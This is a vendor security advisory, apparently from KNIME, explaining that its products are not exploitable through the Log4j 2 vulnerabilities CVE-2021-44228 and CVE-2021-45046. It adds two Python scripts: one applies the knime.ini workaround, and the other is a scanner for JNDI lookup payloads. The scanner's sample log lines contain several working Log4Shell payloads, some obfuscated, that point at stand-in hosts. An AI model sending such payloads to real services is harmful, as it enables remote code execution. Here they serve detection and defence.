Summary
Several security vulnerabilities were identified in Apache Log4j 2, a library also present in current KNIME Analytics Platform installations (versions 4.4 and 4.5). The vulnerabilities are reported as CVE-2021-44228 and CVE-2021-45046; more details and links are available on the Log4j security page.
Neither KNIME Server nor KNIME Analytics Platform is directly affected by these issues. The KNIME Server application does not use Log4j. KNIME Analytics Platform uses an older version of Log4j (1.2.15) for its own logging, which is not affected by these issues. The only exception is a library used for processing PMML documents, which does ship Log4j 2 but is not susceptible to the published exploits. Details are given below.
In any case, we recommend adding the system property -Dlog4j2.formatMsgNoLookups=true
at the bottom of the knime.ini (after the -vmargs line, so that it is passed to the JVM). This is one of the official workarounds and prevents exploitation of CVE-2021-44228. Note that Apache no longer considers this property a complete mitigation for CVE-2021-45046 in configurations whose log pattern evaluates context lookups; as explained below, the KNIME logging configuration does not do that.
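As an added example (not part of this advisory and not KNIME's own tooling), the following Python script checks an installation for the bundled log4j-core jar and applies the knime.ini workaround described above, without adding the line twice. It assumes that the install root contains knime.ini and the plugins tree, that the jar keeps Apache's log4j-core-<version>.jar file name, and that, as in other Eclipse-based launchers, everything after the -vmargs line in the .ini is passed to the JVM.

```python
"""Check a KNIME Analytics Platform install for the bundled Log4j 2 jar and
apply the knime.ini workaround from the advisory above.

Added example, not KNIME's own tooling.  Assumptions (not stated by the
advisory): the install root holds knime.ini and the plugins tree; the jar
keeps Apache's log4j-core-<major>.<minor>.<patch>.jar name; as in other
Eclipse-based launchers, everything after the -vmargs line is passed to the
JVM, so the property must appear after it."""
from __future__ import annotations

import re
import sys
from pathlib import Path

FIXED_VERSION = (2, 17, 1)            # version the fix release will ship
WORKAROUND = "-Dlog4j2.formatMsgNoLookups=true"
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")


def parse_version(jar_name: str) -> tuple[int, int, int] | None:
    """Version triple from a log4j-core jar file name, or None if not one."""
    m = JAR_NAME.match(jar_name)
    if m is None:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def find_log4j_core(root: Path) -> list[tuple[Path, tuple[int, int, int], bool]]:
    """Every log4j-core jar under root as (path, version, needs_update)."""
    found = []
    for jar in sorted(root.rglob("log4j-core-*.jar")):
        version = parse_version(jar.name)
        if version is not None:
            found.append((jar, version, version < FIXED_VERSION))
    return found


def ensure_workaround(ini: Path) -> bool:
    """Append the workaround to knime.ini once; True if the file was changed."""
    lines = ini.read_text(encoding="utf-8").splitlines()
    stripped = [line.strip() for line in lines]
    if WORKAROUND in stripped:
        return False
    if "-vmargs" not in stripped:         # launcher args only reach the JVM after -vmargs
        lines.append("-vmargs")
    lines.append(WORKAROUND)
    # splitlines/join also repairs a file whose last line has no newline,
    # which would otherwise glue the new argument onto the previous one
    ini.write_text("\n".join(lines) + "\n", encoding="utf-8")
    return True


def main(root: Path) -> int:
    """Report jar versions under root and patch root/knime.ini."""
    for jar, version, needs_update in find_log4j_core(root):
        state = "below 2.17.1, update pending" if needs_update else "ok"
        print(f"{jar.relative_to(root)}: {'.'.join(map(str, version))} ({state})")
    changed = ensure_workaround(root / "knime.ini")
    print("knime.ini:", "workaround added" if changed else "workaround already present")
    return 0


if __name__ == "__main__":
    sys.exit(main(Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")))
```

Run it with the installation directory as the only argument (the directory that contains knime.ini). The version check deliberately keys on the file name only; it does not prove the jar is reachable at runtime, it just tells you whether the update mentioned later in this advisory has arrived in your installation.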
Details
After careful review of the library, the reported vulnerabilities, and their use within KNIME software, we came to the conclusion that the vulnerabilities cannot be exploited in KNIME products.
Apache Log4j is a library for logging application behavior. It is not used in the KNIME Server application (Tomcat); in KNIME Analytics Platform, both version 1 and version 2 of the library are distributed and used.
The reported problems concern version 2, which is present in KNIME Analytics Platform only inside the framework extension XMLBeans (org.apache.xmlbeans5_5.0.0.v202104291535/lib/log4j-core-2.14.0.jar). The exploit works by sending specially crafted input (a string containing a lookup such as ${jndi:...}) to an affected service that includes it in a log message; Log4j 2 then resolves the lookup and can load and execute arbitrary code from a remote location. Since KNIME Analytics Platform is a local application that does not listen for external requests, it is not susceptible to this issue.
When KNIME Analytics Platform is used as an executor for a KNIME Server, it is theoretically possible that an attacker invokes a workflow that passes provided data (e.g. a PMML model read by the PMML Reader) through the XMLBeans library, which would then have to include parts of the sent file in a log message. However, this is difficult to construct (if it is possible at all; we have not found a way to do it ourselves so far) and requires the interaction of an authenticated user. Moreover, the second vulnerability, CVE-2021-45046, is only exploitable if the log pattern includes context-specific information (a Thread Context lookup such as ${ctx:...} or a %X/%mdc pattern). This is not the case for the logging configuration of KNIME Analytics Platform (see <runtime-workspace>/.metadata/knime/log4j3.xml).
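The exploit described in the two paragraphs above depends on a string carrying a Log4j lookup reaching a log message. The following Python script, an added example rather than anything from this advisory or from KNIME, shows how to check text that an executor or the server in front of it might log (HTTP access log lines, the contents of an uploaded PMML file, workflow input) for such lookups. It collapses the usual obfuscations (nested ${lower:...} and ${key:-default} lookups, URL encoding) in the innermost-first order Log4j itself uses, so a disguised payload is reported in its plain form. The sample log lines are constructed for this example and use documentation address ranges.

```python
"""Flag Log4j lookup payloads (CVE-2021-44228 style ${jndi:...}) in text.

Added example, not part of the advisory or of KNIME.  The sample lines
below are constructed for this example; hosts use documentation ranges."""
import re
from urllib.parse import unquote

# A lookup with no further lookup nested inside it.  Log4j substitutes the
# innermost lookups first, and this scanner does the same.
INNERMOST = re.compile(r"\$\{([^{}$]*)\}")


def resolve_lookups(text: str, max_rounds: int = 500) -> tuple:
    """Collapse Log4j-style ${...} lookups and collect every jndi target.

    Only the lookup forms attackers use to hide the payload are modelled:
    ${lower:x}, ${upper:x} and ${key:-default} (the default wins because the
    key is never defined).  Any other lookup is replaced by its literal body.
    Returns (normalized text, list of jndi targets)."""
    targets = []
    for _ in range(max_rounds):           # bounded, so odd input cannot loop forever
        m = INNERMOST.search(text)
        if m is None:
            break
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            targets.append(body[5:])
            repl = "<JNDI>"
        elif ":-" in body:
            repl = body.split(":-", 1)[1]
        elif body.lower().startswith("lower:"):
            repl = body[6:].lower()
        elif body.lower().startswith("upper:"):
            repl = body[6:].upper()
        else:
            repl = body
        text = text[:m.start()] + repl + text[m.end():]
    return text, targets


def scan_line(line: str) -> list:
    """Jndi targets hidden in one line (empty list if none).

    URL decoding is applied first so a payload that arrived in a query
    string or header is seen the way the application would see it."""
    _, targets = resolve_lookups(unquote(line))
    return targets


def scan_lines(lines) -> list:
    """(line number, targets) for every line that carries a jndi lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        targets = scan_line(line)
        if targets:
            findings.append((number, targets))
    return findings


# Constructed sample: one benign request, then four ways the same class of
# payload shows up in a web server log (plain, nested lower: lookups,
# URL-encoded, and ${::-x} default-value obfuscation).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.11/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.12%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.13/d}"',
]


if __name__ == "__main__":
    for number, targets in scan_lines(SAMPLE_LINES):
        print(f"line {number}: jndi lookup(s) resolving to {targets}")
```

Feed it any text the executor could have logged; a legitimate "${HOME}"-style reference produces no finding because only lookups that resolve to a jndi: prefix are reported. The scanner is a detection aid, not a sanitizer: the fix remains the Log4j update described below.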
Updating Log4j 2 to 2.17.1 fixes the issues; the update will be shipped with the next regular bug fix releases (KNIME Analytics Platform 4.5.1 and 4.4.3).
KNIME Analytics Platform uses Log4j 1 for most of its logging. Older vulnerabilities are reported against this version, CVE-2019-17571 and CVE-2020-9488, but none of them affects KNIME Analytics Platform because the affected components (remote logging through SocketServer, the JMS appender, and the SMTP appender) are not in use.